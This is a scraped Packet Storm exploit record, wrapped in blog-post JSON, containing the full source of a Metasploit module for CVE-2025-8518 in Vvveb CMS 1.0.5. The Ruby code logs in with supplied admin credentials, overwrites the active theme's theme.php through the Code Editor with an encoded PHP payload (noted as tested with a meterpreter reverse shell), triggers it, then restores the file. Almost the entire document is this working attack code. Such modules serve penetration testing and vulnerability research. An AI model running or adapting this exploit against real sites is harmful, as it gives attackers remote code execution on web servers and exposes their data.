{“lastseen”:”2025-10-22T16:48:43″,”description”:”Vvveb CMS is vulnerable to code injection via…”,”published”:”2025-10-22T00:00:00″,”modified”:”2025-10-22T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Vvveb CMS 1.0.5 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:210781″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-8518″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Remote Code Execution Vulnerability in Vvveb’,\\n ‘Description’ =\\u003e %q{\\n Vvveb CMS is vulnerable to code injection via the Code Editor functionality.\\n \\n Unsanitized editing functionality allows attacker-controlled changes to existing files on the web-accessible filesystem,\\n allowing remote authenticated attackers with access to the Code Editor to achieve code execution\\n when those modified files are executed or served by the application or web server.\\n \\n This vulnerability affects Vvveb CMS versions up to and including 1.0.5.\\n Successful exploitation may result in the remote code execution under the privileges\\n of the web server, potentially exposing sensitive data or disrupting survey operations.\\n \\n An attacker can execute arbitrary system commands in the context of the user running the web server.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Maksim Rogov’, # Metasploit Module\\n ‘Hamed Kohi’ # Vulnerability Discovery\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-8518’],\\n [‘URL’, ‘https:\/\/hkohi.ca\/vulnerability\/8’]\\n ],\\n ‘Platform’ =\\u003e [‘php’],\\n ‘Arch’ =\\u003e [ARCH_PHP],\\n ‘Targets’ =\\u003e [\\n [\\n ‘PHP’,\\n {\\n ‘Platform’ =\\u003e [‘php’],\\n ‘Arch’ =\\u003e ARCH_PHP\\n # Tested with php\/meterpreter\/reverse_tcp\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2025-01-10’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION]\\n }\\n )\\n )\\n \\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘Path to Vvveb CMS’, ‘\/admin\/’]),\\n OptString.new(‘USERNAME’, [true, ‘The username used to authenticate to Vvveb CMS’, ‘admin’]),\\n OptString.new(‘PASSWORD’, [true, ‘The password used to authenticate to Vvveb CMS’, ”])\\n ]\\n )\\n end\\n \\n def get_csrf_token\\n print_status(‘Fetching CSRF token…’)\\n \\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘method’ =\\u003e ‘GET’,\\n ‘keep_cookies’ =\\u003e true\\n )\\n fail_with(Failure::Unreachable, \\”#{peer} – No response from web service\\”) unless res\\n fail_with(Failure::UnexpectedReply, \\”#{peer} – Unexpected HTTP code #{res.code}\\”) unless res.code == 200\\n \\n html = res.get_html_document\\n csrf_input = html.at(‘input[name=\\”csrf\\”]’)\\n fail_with(Failure::UnexpectedReply, \\”#{peer} – Unable to extract CSRF token\\”) unless csrf_input\\n \\n token = csrf_input.attributes.fetch(‘value’, nil)\\n fail_with(Failure::UnexpectedReply, \\”#{peer} – CSRF token is empty\\”) if token.blank?\\n \\n print_good(\\”Token successfully fetched: #{token}\\”)\\n token.to_s\\n end\\n \\n def login(raise_on_fail: true)\\n csrf_token = get_csrf_token\\n \\n print_status(‘Attempting login…’)\\n \\n post_data = Rex::MIME::Message.new\\n post_data.add_part(csrf_token, nil, nil, ‘form-data; name=\\”csrf\\”‘)\\n post_data.add_part(”, nil, nil, ‘form-data; name=\\”redir\\”‘)\\n post_data.add_part(datastore[‘USERNAME’], nil, nil, ‘form-data; name=\\”user\\”‘)\\n post_data.add_part(datastore[‘PASSWORD’], nil, nil, ‘form-data; name=\\”password\\”‘)\\n \\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘method’ =\\u003e ‘POST’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{post_data.bound}\\”,\\n ‘vars_get’ =\\u003e { ‘module’ =\\u003e ‘user\/login’ },\\n ‘data’ =\\u003e post_data.to_s\\n )\\n \\n if raise_on_fail\\n fail_with(Failure::Unreachable, \\”#{peer} – No response from web service\\”) unless res\\n fail_with(Failure::NoAccess, \\”#{peer} – Incorrect credentials – #{datastore[‘USERNAME’]}:#{datastore[‘PASSWORD’]}\\”) if res.body.include?(‘wrong email or password’)\\n fail_with(Failure::UnexpectedReply, \\”#{peer} – Unexpected HTTP code #{res.code}\\”) unless res.code == 302\\n else\\n return CheckCode::Unknown(‘It was not possible to determine the software version because a network error occurred during the authentication process’) unless res\\n return CheckCode::Unknown(\\”It was not possible to determine the software version because the provided credenaials #{datastore[‘USERNAME’]}:#{datastore[‘PASSWORD’]} are invalid\\”) if res.body.include?(‘wrong email or password’)\\n return CheckCode::Unknown(‘It was not possible to determine the software version because an unknown network error code was returned during the authentication process’) unless res.code == 302\\n end\\n \\n @logged_in = true\\n print_good(‘Login successful’)\\n return\\n end\\n \\n def get_active_theme_path\\n print_status(‘Identifying the active theme path…’)\\n \\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘index.php’),\\n ‘method’ =\\u003e ‘GET’,\\n ‘vars_get’ =\\u003e { ‘module’ =\\u003e ‘theme\/themes’ }\\n )\\n fail_with(Failure::Unreachable, \\”#{peer} – No response from web service\\”) unless res\\n fail_with(Failure::UnexpectedReply, \\”#{peer} – Unexpected HTTP code #{res.code}\\”) unless res.code == 200\\n \\n active_theme = res.get_html_document.at(‘div.list-card.active’)\\n fail_with(Failure::UnexpectedReply, \\”#{peer} – Card with the active theme was not found\\”) if active_theme.blank?\\n \\n theme_preview = active_theme.at(‘.card-img-top img’).attributes.fetch(‘src’, nil)\\n fail_with(Failure::UnexpectedReply, \\”#{peer} – Preview of the active theme card was not found\\”) if theme_preview.blank?\\n \\n theme_dir = File.dirname(theme_preview)\\n theme_path = theme_dir + ‘\/theme.php’\\n \\n print_good(\\”Theme path successfully identified: #{theme_path}\\”)\\n theme_path\\n end\\n \\n def get_theme_content(theme_path)\\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘index.php’),\\n ‘method’ =\\u003e ‘GET’,\\n ‘vars_get’ =\\u003e {\\n ‘module’ =\\u003e ‘editor\/code’,\\n ‘action’ =\\u003e ‘loadFile’,\\n ‘type’ =\\u003e ‘themes’,\\n ‘file’ =\\u003e theme_path\\n }\\n )\\n fail_with(Failure::Unreachable, \\”#{peer} – No response from web service\\”) unless res\\n fail_with(Failure::UnexpectedReply, \\”#{peer} – Unexpected HTTP code #{res.code}\\”) unless res.code == 200\\n \\n res.body\\n end\\n \\n def set_theme_content(theme_path, content)\\n post_data = Rex::MIME::Message.new\\n post_data.add_part(content, nil, nil, ‘form-data; name=\\”content\\”‘)\\n \\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘index.php’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{post_data.bound}\\”,\\n ‘vars_get’ =\\u003e {\\n ‘module’ =\\u003e ‘editor\/code’,\\n ‘action’ =\\u003e ‘save’,\\n ‘type’ =\\u003e ‘themes’,\\n ‘file’ =\\u003e theme_path\\n },\\n ‘data’ =\\u003e post_data.to_s\\n )\\n \\n fail_with(Failure::Unreachable, \\”#{peer} – No response from web service\\”) unless res\\n fail_with(Failure::UnexpectedReply, \\”#{peer} – Unexpected HTTP code #{res.code}\\”) if res.code != 200\\n end\\n \\n def trigger_payload(_theme_path)\\n print_status(‘Triggering payload…’)\\n \\n send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘index.php’),\\n ‘method’ =\\u003e ‘GET’,\\n ‘vars_get’ =\\u003e {\\n ‘module’ =\\u003e ‘editor\/editor’,\\n ‘url’ =\\u003e ‘\/’,\\n ‘template’ =\\u003e ‘index.html’\\n }\\n )\\n end\\n \\n def set_payload(theme_path)\\n print_status(‘Setting up payload…’)\\n set_theme_content(theme_path, payload.encoded)\\n print_good(‘Payload setup complete’)\\n end\\n \\n def check\\n error_message = login(raise_on_fail: false)\\n return error_message if error_message\\n \\n print_status(‘Checking version…’)\\n \\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘index.php’),\\n ‘method’ =\\u003e ‘GET’,\\n ‘vars_get’ =\\u003e { ‘module’ =\\u003e ‘tools\/systeminfo’ }\\n )\\n return CheckCode::Detected(‘Authentication process completed successfully. It means that the server uses Vvveb CMS. However, it was not possible to determine the software version because a network error occurred during the request to the software version page’) unless res\\n return CheckCode::Detected(\\”Authentication process completed successfully. It means that the server uses Vvveb CMS. However, it was not possible to determine the software version because the server returned an unknown status code #{res.code} during the request to the software version page\\”) unless res.code == 200\\n \\n version_td = res.get_html_document.at(‘tr:has(th:contains(\\”Vvveb version\\”)) td’)\\n return CheckCode::Detected(‘Authentication process and the request to the software version page both completed successfully. It means that the server uses Vvveb CMS. However, The Vvveb version tag was not found on the software version page’) if version_td.nil?\\n \\n version = Rex::Version.new(version_td\\u0026.text\\u0026.strip)\\n return CheckCode::Appears(\\”Detected version #{version}, which is vulnerable\\”) if version \\u003c= Rex::Version.new(‘1.0.5’)\\n \\n CheckCode::Safe(\\”Detected version #{version}, which is not vulnerable\\”)\\n end\\n \\n def cleanup\\n begin\\n set_theme_content(@theme_path, @default_theme_content) unless @theme_path.nil? \\u0026\\u0026 @default_theme_content.nil?\\n rescue StandardError\\n # After receiving the shell, when calling the set_theme_content, the server times out, but there is no need to return an error.\\n end\\n \\n super\\n end\\n \\n def exploit\\n login(raise_on_fail: true) unless @logged_in\\n @theme_path = get_active_theme_path\\n @default_theme_content = get_theme_content(@theme_path)\\n set_payload(@theme_path)\\n trigger_payload(@theme_path)\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/210781″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:L\/I:L\/A:L\/E:P\/RL:O\/RC:C”,”baseScore”:4.7,”baseSeverity”:”MEDIUM”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”HIGH”,”userInteraction”:”NONE”,”scope”:”UNCHANGED”,”confidentialityImpact”:”LOW”,”integrityImpact”:”LOW”,”availabilityImpact”:”LOW”}},”href”:”https:\/\/packetstorm.news\/files\/id\/210781\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-22T16:48:43″,”description”:”Vvveb CMS is vulnerable to code injection via…”,”published”:”2025-10-22T00:00:00″,”modified”:”2025-10-22T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Vvveb CMS 1.0.5 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:210781″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-8518″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-22723","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n